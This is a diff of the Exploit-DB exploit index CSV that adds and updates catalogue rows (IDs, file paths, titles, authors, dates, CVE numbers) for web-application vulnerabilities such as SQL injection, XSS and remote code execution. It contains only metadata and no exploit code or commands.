4712,exploits/php/webapps/4712.txt,"falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting",2007-12-10,MhZ91,webapps,php,,2007-12-09,2016-10-20,1,OSVDB-40988;CVE-2007-6490;OSVDB-40987;OSVDB-40986;CVE-2007-6489;OSVDB-40985;CVE-2007-6488,,,,http://www.exploit-db.comfalcon143.tar.gz,
@@ -18278,6 +18281,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45667,exploits/php/webapps/45667.txt,"Fifa Master XLS 2.3.2 - 'usw' SQL Injection",2018-10-24,"Ihsan Sencan",webapps,php,,2018-10-24,2018-10-24,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comfifamasterXLS-v2.3.2.rar,
48635,exploits/php/webapps/48635.txt,"File Management System 1.1 - Persistent Cross-Site Scripting",2020-07-06,KeopssGroup0day_Inc,webapps,php,,2020-07-06,2020-07-06,0,,,,,,
38363,exploits/php/webapps/38363.txt,"File Manager - HTML Injection / Local File Inclusion",2013-02-23,"Benjamin Kunz Mejri",webapps,php,,2013-02-23,2015-09-30,1,,,,,,https://www.securityfocus.com/bid/58313/info
+51505,exploits/php/webapps/51505.py,"File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)",2023-06-04,"Mateus Machado Tesser",webapps,php,,2023-06-04,2023-06-04,0,CVE-2023-2068,,,,,
10497,exploits/php/webapps/10497.txt,"File Share 1.0 - SQL Injection",2009-12-16,"TOP SAT 13",webapps,php,,2009-12-15,,0,,,,,,
12763,exploits/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,webapps,php,,2010-05-26,,0,,,,,,
6040,exploits/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injections",2008-07-11,"Nu Am Bani",webapps,php,,2008-07-10,2016-12-14,1,OSVDB-23864;CVE-2006-1278;OSVDB-23863,,,,http://www.exploit-db.comfilestore.zip,
@@ -23512,6 +23516,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
6763,exploits/php/webapps/6763.txt,"Mosaic Commerce - 'cid' SQL Injection",2008-10-16,"Ali Abbasi",webapps,php,,2008-10-15,2016-12-29,1,OSVDB-49197;CVE-2008-4599,,,,,
28310,exploits/php/webapps/28310.txt,"Moskool 1.5 Component - 'Admin.Moskool.php' Remote File Inclusion",2006-07-31,saudi.unix,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3967;OSVDB-29073,,,,,https://www.securityfocus.com/bid/19245/info
38152,exploits/php/webapps/38152.txt,"MotoCMS - 'admin/data/users.xml' Access Restriction / Information Disclosure",2013-01-08,AkaStep,webapps,php,,2013-01-08,2019-03-28,1,,,,,,https://www.securityfocus.com/bid/57055/info
+51504,exploits/php/webapps/51504.txt,"MotoCMS Version 3.4.3 - SQL Injection",2023-06-04,tmrswrr,webapps,php,,2023-06-04,2023-06-04,1,,,,,,
27454,exploits/php/webapps/27454.txt,"Motorola - BlueTooth Interface Dialog Spoofing",2006-03-22,kspecial,webapps,php,,2006-03-22,2014-01-02,1,CVE-2006-1367;OSVDB-24038,,,,,https://www.securityfocus.com/bid/17190/info
35160,exploits/php/webapps/35160.txt,"Mouse Media Script 1.6 - Persistent Cross-Site Scripting",2014-11-05,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,1,OSVDB-114656,,,,,
22151,exploits/php/webapps/22151.txt,"Movable Type Pro 5.13en - Persistent Cross-Site Scripting",2012-10-22,sqlhacker,webapps,php,,2012-10-22,2012-10-22,0,CVE-2012-1503;OSVDB-86729,,,,,
@@ -24733,7 +24738,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48419,exploits/php/webapps/48419.txt,"Online Scheduling System 1.0 - 'username' SQL Injection",2020-05-05,"Saurav Shukla",webapps,php,,2020-05-05,2020-05-05,0,,,,,,
48409,exploits/php/webapps/48409.txt,"Online Scheduling System 1.0 - Authentication Bypass",2020-05-01,boku,webapps,php,,2020-05-01,2020-05-01,0,,,,,,
48403,exploits/php/webapps/48403.txt,"Online Scheduling System 1.0 - Persistent Cross-Site Scripting",2020-05-01,boku,webapps,php,,2020-05-01,2020-05-01,0,,,,,,
-51494,exploits/php/webapps/51494.py,"Online Security Guards Hiring System 1.0 - Reflected XSS",2023-05-31,"AFFAN AHMED",webapps,php,,2023-05-31,2023-05-31,0,CVE-2023-0527,,,,,
+51494,exploits/php/webapps/51494.py,"Online Security Guards Hiring System 1.0 - Reflected XSS",2023-05-31,"AFFAN AHMED",webapps,php,,2023-05-31,2023-06-04,1,CVE-2023-0527,,,,,
48819,exploits/php/webapps/48819.txt,"Online Shop Project 1.0 - 'p' SQL Injection",2020-09-21,Augkim,webapps,php,,2020-09-21,2020-09-21,0,,,,,,
48771,exploits/php/webapps/48771.txt,"Online Shopping Alphaware 1.0 - 'id' SQL Injection",2020-08-28,"Moaaz Taha",webapps,php,,2020-08-28,2020-08-28,0,,,,,,
48725,exploits/php/webapps/48725.txt,"Online Shopping Alphaware 1.0 - Authentication Bypass",2020-07-30,"Ahmed Abbas",webapps,php,,2020-07-30,2020-07-30,0,,,,,,
@@ -30786,6 +30791,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31866,exploits/php/webapps/31866.txt,"TorrentTrader Classic 1.x - 'scrape.php' SQL Injection",2008-05-31,"Charles Vaughn",webapps,php,,2008-05-31,2014-02-24,1,CVE-2008-6418;OSVDB-45858,,,,,https://www.securityfocus.com/bid/29451/info
8931,exploits/php/webapps/8931.txt,"TorrentVolve 1.4 - 'deleteTorrent' Delete Arbitrary File",2009-06-11,Br0ly,webapps,php,,2009-06-10,,1,OSVDB-55174;CVE-2009-2101,,,,,
3707,exploits/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a - 'absolute_path' Remote File Inclusion",2007-04-11,"Cold Zero",webapps,php,,2007-04-10,,1,OSVDB-35762;CVE-2007-2317;OSVDB-35761,,,,,
+51500,exploits/php/webapps/51500.txt,"Total CMS 1.7.4 - Remote Code Execution (RCE)",2023-06-04,tmrswrr,webapps,php,,2023-06-04,2023-06-04,0,,,,,,
37632,exploits/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter - Multiple Cross-Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",webapps,php,,2012-08-13,2015-07-18,1,CVE-2012-4236;OSVDB-84697,,,,,https://www.securityfocus.com/bid/54985/info
1753,exploits/php/webapps/1753.txt,"TotalCalendar 2.30 - 'inc' Remote File Inclusion",2006-05-05,Aesthetico,webapps,php,,2006-05-04,,1,OSVDB-25237;CVE-2006-7055,,,,,
8503,exploits/php/webapps/8503.txt,"TotalCalendar 2.4 - 'Include' Local File Inclusion",2009-04-21,SirGod,webapps,php,,2009-04-20,,1,OSVDB-54009;CVE-2009-1406,,,,,
@@ -34506,7 +34512,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip,
39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
-51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31126,,,,,
+51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,
51228,exploits/python/webapps/51228.txt,"Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31161,,,,,
50318,exploits/python/webapps/50318.py,"Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated)",2021-09-22,"Mohin Paramasivam",webapps,python,,2021-09-22,2021-09-22,0,,,,,,
47441,exploits/python/webapps/47441.txt,"TheSystem 1.0 - Command Injection",2019-09-30,"Sadik Cetin",webapps,python,,2019-09-30,2019-09-30,0,,,,,http://www.exploit-db.comthesystem-master.zip,